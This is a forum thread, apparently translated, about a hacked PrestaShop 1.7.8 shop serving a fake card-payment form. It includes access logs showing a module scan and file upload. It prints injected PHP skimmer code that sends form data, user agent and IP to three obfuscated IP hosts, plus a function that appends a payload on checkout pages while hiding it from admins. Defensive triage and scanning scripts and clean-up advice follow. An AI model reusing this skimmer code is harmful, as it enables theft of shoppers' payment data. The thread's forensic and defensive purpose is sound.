
Hack prestashop 1.7.8



Hello everyone,

I regularly get hacked on my Presta 1.7.8: a fake credit-card payment form is displayed on the order completion page.

I looked at the logs but I can't read them properly; it seems the hacker's IP uses "Uptime-Kuma/1.23.16", which I don't know at all.

Could someone help me decipher the logs below?

144.91.86.21 - - [16/Feb/2025:08:51:50 +0100] "GET / HTTP/1.0" 302 404 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:51:50 +0100] "GET /fr/ HTTP/1.0" 200 1024 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:52:50 +0100] "GET / HTTP/1.0" 302 404 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:52:51 +0100] "GET /fr/ HTTP/1.0" 200 1024 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:53:51 +0100] "GET / HTTP/1.0" 302 1799 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:53:51 +0100] "GET /fr/ HTTP/1.0" 200 1024 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:54:51 +0100] "GET / HTTP/1.0" 302 404 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:54:51 +0100] "GET /fr/ HTTP/1.0" 200 1024 "-" "Uptime-Kuma/1.23.16"
185.208.158.165 - - [16/Feb/2025:08:55:05 +0100] "GET / HTTP/1.0" 302 404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:05 +0100] "GET /fr/ HTTP/1.0" 200 12419 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:06 +0100] "POST /modules/bamegamenu/ajax_phpcode.php HTTP/1.0" 404 42798 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:06 +0100] "GET /modules/cartabandonmentpro/views/js/fileman/php/movefile.php HTTP/1.0" 404 42827 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:07 +0100] "GET /modules/explorerpro/action.php HTTP/1.0" 404 42793 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:07 +0100] "GET /modules/nvn_export_orders/calendar/tcal.js HTTP/1.0" 404 42806 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:07 +0100] "GET /modules/wdoptionpanel/admin/js/colorpicker.js HTTP/1.0" 404 42810 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:08 +0100] "GET /modules/tdpsthemeoptionpanel/js/colorpicker.js HTTP/1.0" 404 42808 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:08 +0100] "GET /modules/cdesigner/views/js/cdesigner.js HTTP/1.0" 404 42802 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:08 +0100] "GET /modules/jmsslider/views/js/jquery.fractionslider.js HTTP/1.0" 404 42816 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:09 +0100] "GET /modules/apmarketplace/ajax.php HTTP/1.0" 404 42793 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14"
185.208.158.165 - - [16/Feb/2025:08:55:10 +0100] "POST /index.php?fc=module&module=jmarketplace&controller=addproduct HTTP/1.0" 404 43064 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:10 +0100] "POST /modules/jmarketplace/temp/ini.php HTTP/1.0" 404 42649 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:10 +0100] "GET /modules/fieldvmegamenu/ajax/upload.php HTTP/1.0" 404 42802 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:11 +0100] "GET /modules/simpleslideshow/uploadimage.php HTTP/1.0" 404 42800 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:11 +0100] "GET /modules/productpageadverts/uploadimage.php HTTP/1.0" 404 42805 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:11 +0100] "GET /modules/homepageadvertise2/uploadimage.php HTTP/1.0" 404 42805 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:12 +0100] "GET /modules/vm_advancedconfigurator/js/dropzone/upload.php HTTP/1.0" 404 42819 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:12 +0100] "GET /modules/megamenu/uploadify/uploadify.php HTTP/1.0" 200 390 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14"
185.208.158.165 - - [16/Feb/2025:08:55:12 +0100] "POST /modules/megamenu/uploadify/uploadify.php HTTP/1.0" 200 465 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:12 +0100] "POST /ini.php HTTP/1.0" 200 441 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:13 +0100] "GET /ini.php HTTP/1.0" 200 413 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:13 +0100] "POST /ini.php HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14"
185.208.158.165 - - [16/Feb/2025:08:55:13 +0100] "POST /ini.php HTTP/1.0" 200 1897 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari

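As an added example (not from the thread), a triage script over lines modelled on the log above. Uptime-Kuma is an open-source uptime monitor, and that first IP only fetches / and /fr/ once a minute; the second IP's sequence, a burst of 404s on module endpoints followed by 200s on POSTs to .php files, is the one to follow up on disk. The verdict labels and the probe threshold are my assumptions.

```python
import re
from collections import defaultdict

# Constructed sample, modelled on the lines in the post (user agents shortened).
SAMPLE_LOG = """\
144.91.86.21 - - [16/Feb/2025:08:51:50 +0100] "GET / HTTP/1.0" 302 404 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:51:50 +0100] "GET /fr/ HTTP/1.0" 200 1024 "-" "Uptime-Kuma/1.23.16"
185.208.158.165 - - [16/Feb/2025:08:55:06 +0100] "POST /modules/bamegamenu/ajax_phpcode.php HTTP/1.0" 404 42798 "-" "Mozilla/5.0"
185.208.158.165 - - [16/Feb/2025:08:55:07 +0100] "GET /modules/explorerpro/action.php HTTP/1.0" 404 42793 "-" "Mozilla/5.0"
185.208.158.165 - - [16/Feb/2025:08:55:11 +0100] "GET /modules/simpleslideshow/uploadimage.php HTTP/1.0" 404 42800 "-" "Mozilla/5.0"
185.208.158.165 - - [16/Feb/2025:08:55:12 +0100] "POST /modules/megamenu/uploadify/uploadify.php HTTP/1.0" 200 465 "-" "Mozilla/5.0"
185.208.158.165 - - [16/Feb/2025:08:55:12 +0100] "POST /ini.php HTTP/1.0" 200 441 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

def triage(log_text, min_probes=3):
    """Per client IP: a verdict ("monitor", "suspect" or "review") plus the evidence."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, method, path, status, ua = m.groups()
            by_ip[ip].append((method, path, int(status), ua))
    report = {}
    for ip, reqs in by_ip.items():
        # Distinct module directories that answered 404: the client is fingerprinting
        # which add-ons are installed, not browsing the shop.
        probed = sorted({p.split("/")[2] for _, p, s, _ in reqs
                         if p.startswith("/modules/") and s == 404})
        # A 200 on a POST to a .php file after such a scan is what needs checking on disk.
        posts_ok = [p for meth, p, s, _ in reqs if meth == "POST" and s == 200 and p.endswith(".php")]
        paths = {p for _, p, _, _ in reqs}
        if len(probed) >= min_probes and posts_ok:
            verdict = "suspect"
        elif paths <= {"/", "/fr/"} and all("Uptime-Kuma" in ua for _, _, _, ua in reqs):
            verdict = "monitor"    # front page only, always the same UA: an uptime checker
        else:
            verdict = "review"
        report[ip] = {"verdict": verdict, "probed_modules": probed, "successful_posts": posts_ok}
    return report

if __name__ == "__main__":
    for ip, r in triage(SAMPLE_LOG).items():
        print(ip, r["verdict"], r["probed_modules"], r["successful_posts"])
```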

I would make a backup and replace the crucial "red" files with the original PrestaShop 1.7.8 .zip. Do you have version 1.7.8.10? Otherwise, also try updating to the latest version.


OK, I found this in the file classes/controller/controller.php:

// Three base64-encoded URLs; they decode to https://106.14.40.200,
// https://47.102.208.65 and https://47.101.195.98 (the hosts the data is sent to).
$ar=["aHR0cHM6Ly8xMDYuMTQuNDAuMjAw","aHR0cHM6Ly80Ny4xMDIuMjA4LjY1","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
// First copy: the POST key carries a "_commented_Virus_infection_fixed_already_..." suffix,
// so this branch no longer matches the parameter the fake form actually sends.
if(isset($_POST['advert_hash_commented_Virus_infection_fixed_already_67b4690a06f33'])){
    foreach ($ar as $v){
        $array = array(
            'statistics_hash_commented_Virus_infection_fixed_already_67b4690a06f33' => $_POST['advert_hash_commented_Virus_infection_fixed_already_67b4690a06f33'],
            'ua' => $_SERVER['HTTP_USER_AGENT'],
            'cl_ip' => $_SERVER['REMOTE_ADDR']
        );
        $ch = curl_init(base64_decode($v));
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 4);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $html = curl_exec($ch);
        curl_close($ch);
    }
}

// Second copy: the original, still live. Whatever the fake payment form POSTs as
// "advert_hash" is forwarded, together with the visitor's user agent and IP, to each
// of the three hosts. TLS verification is switched off so any certificate is accepted,
// and the short timeout keeps the page from stalling noticeably.
$ar=["aHR0cHM6Ly8xMDYuMTQuNDAuMjAw","aHR0cHM6Ly80Ny4xMDIuMjA4LjY1","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['advert_hash'])){
    foreach ($ar as $v){
        $array = array(
            'statistics_hash' => $_POST['advert_hash'],
            'ua' => $_SERVER['HTTP_USER_AGENT'],
            'cl_ip' => $_SERVER['REMOTE_ADDR']
        );
        $ch = curl_init(base64_decode($v));
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 4);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $html = curl_exec($ch);
        curl_close($ch);
    }
}


  On 2/18/2025 at 11:12 AM, Mostyma said:

OK, I found this in the file classes/controller/controller.php:


Your site has been compromised twice, which confirms there is a security hole.

It is imperative to carry out a thorough clean-up quickly and to put the site into maintenance mode immediately, to prevent any risk of your customers' data being stolen.


OK, how do I find the hole? Can it be seen in the files over SFTP?

I also spotted this in the same controller.php file:


    // Injected into classes/controller/controller.php. $p is the path, under the web root,
    // of a file holding a base64-encoded payload (the fake payment form).
    public function jschecks($html,$p)
    {
        // URL fragments meaning "order", "cart" or "checkout" in many languages, some of
        // them percent-encoded: the payload is only injected on checkout-like pages.
        $urp=[
            "order",
            "Bestellung",
            "bestellung",
            "commande",
            "objednavka",
            "pedido",
            "carrito",
            "koszykgt",
            "zamowienie",
            "comanda",
            "checkout",
            "ordine",
            "befejezett-rendeles",
            "wienie",
            "הזמנה",
            "%D7%94%D7%96%D7%9E%D7%A0%D7%94",
            "sipariş vermiş olmalısınız",
            "sipari%C5%9F%20vermi%C5%9F%20olmal%C4%B1s%C4%B1n%C4%B1z",
            "παραγγελία",
            "%CF%80%CE%B1%CF%81%CE%B1%CE%B3%CE%B3%CE%B5%CE%BB%CE%AF%CE%B1",
            "siparis",
            "encomenda",
            "objednávku",
            "objedn%C3%A1vku",
            "objednávka",
            "objedn%C3%A1vka",
            "objednavku",
            "greitas-uzsakymas",
            "rendeles-befejezese",
            "zamowieni",
            "u%C5%BEsakymas",
            "porud%C5%BEbinu",
            "bestelling",
            "porachka",
            "ordre",
            "hurtigordre",
            "uzsakymas",
        ];

        include_once($_SERVER['DOCUMENT_ROOT'].'/config/config.inc.php');
        include_once($_SERVER['DOCUMENT_ROOT'].'/config/settings.inc.php');
        include_once($_SERVER['DOCUMENT_ROOT'].'/classes/Cookie.php');
        $context = Context::getContext();
        $cart = new Cart($context->cookie->id_cart);

        // Only for visitors who have a cart ...
        if($cart->id!=""){

            // ... and never while a back-office employee cookie is present, so the shop
            // owner does not see the fake form when checking the site.
            $cookie = new Cookie('psAdmin');
            if (!$cookie->id_employee){

                foreach($urp as $u){
                    // The two "if (0)" guards prepended on the next line make the whole
                    // branch dead code; they are not part of the injected logic itself.
if (0) if (0)                     if (strpos($_SERVER["REQUEST_URI"], $u) !== false && strpos($_SERVER["REQUEST_URI"], "admin") == false && strpos($_SERVER["REQUEST_URI"], "Admin") == false ){
                        // Decode the payload file and append it to the rendered page.
                        $html=$html.@base64_decode(@file_get_contents($_SERVER["DOCUMENT_ROOT"].$p));
                        return $html;
                    }
                }
            }
        }
        return $html;
    }

Yes, you can identify the problematic modules referenced by FoP

  On 2/17/2025 at 9:18 AM, Prestashop Addict said:

You can check on this site.

Then fix the code.

Delete all unnecessary modules.

Restore the original core files.

Check your database.

Basically, clean your site of its hack while making sure the hole is no longer active, because a hacked site will always be attacked again afterwards.

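An added example (not code from the thread or from PrestaShop) for the "restore the original core files" step: unpack the 1.7.8 release zip next to a copy of the live tree, diff the two by hash to list modified and added files, and grep the live PHP for the two constructs that appear in the injected code above, curl_init(base64_decode(...)) and base64_decode(file_get_contents(...)). The directory layout and the demo trees are constructed for the stand-alone run.

```python
import hashlib, re, tempfile
from pathlib import Path

# Constructs seen in the injected code in this thread: a base64-encoded URL handed to
# curl, and a base64 payload read from a file on disk and appended to the page HTML.
SUSPICIOUS = [
    re.compile(r"curl_init\(\s*base64_decode\("),
    re.compile(r"base64_decode\(\s*@?file_get_contents\("),
]

def hash_tree(root):
    """Map every file under root (path relative to root) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def compare(pristine_root, live_root):
    """(modified, added, missing) relative paths of the live tree vs. the pristine release."""
    ref, live = hash_tree(pristine_root), hash_tree(live_root)
    modified = sorted(f for f in ref if f in live and live[f] != ref[f])
    added = sorted(f for f in live if f not in ref)      # e.g. a dropped /ini.php
    missing = sorted(f for f in ref if f not in live)
    return modified, added, missing

def scan_php(live_root):
    """PHP files under live_root that contain one of the indicator constructs."""
    root = Path(live_root)
    return sorted(p.relative_to(root).as_posix() for p in root.rglob("*.php")
                  if any(rx.search(p.read_text(errors="replace")) for rx in SUSPICIOUS))

def build_demo():
    """Constructed pristine and live trees (not a real shop) so the script runs stand-alone."""
    base = Path(tempfile.mkdtemp())
    ref, live = base / "pristine", base / "live"
    for d in (ref, live):
        (d / "classes/controller").mkdir(parents=True)
        (d / "classes/controller/controller.php").write_text("<?php class Controller {}\n")
        (d / "index.php").write_text("<?php echo 'shop';\n")
    # Live copy: a tampered core file plus an extra file at the web root.
    (live / "classes/controller/controller.php").write_text(
        "<?php class Controller {}\n$ch = curl_init(base64_decode($v));\n")
    (live / "ini.php").write_text("<?php /* constructed placeholder for a dropped file */\n")
    return ref, live

if __name__ == "__main__":
    ref, live = build_demo()
    modified, added, missing = compare(ref, live)
    print("modified:", modified, "added:", added, "missing:", missing)
    print("indicator hits:", scan_php(live))
```

Anything listed as added or modified under classes/, controllers/ or the web root deserves a look before the site comes out of maintenance mode; the pattern scan only catches the two constructs shown in this thread.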

Hello,

By hand :( In general they add base64-encoded code to obfuscate the malicious code. You may also find .txt files that are automatically turned into .php by base64-encoded code.

I agree with @Mediacom87: a virus's persistence is a hacker's key asset.

In short, a big clean-up with analysis and forensics, to stop it happening again.

Good luck.
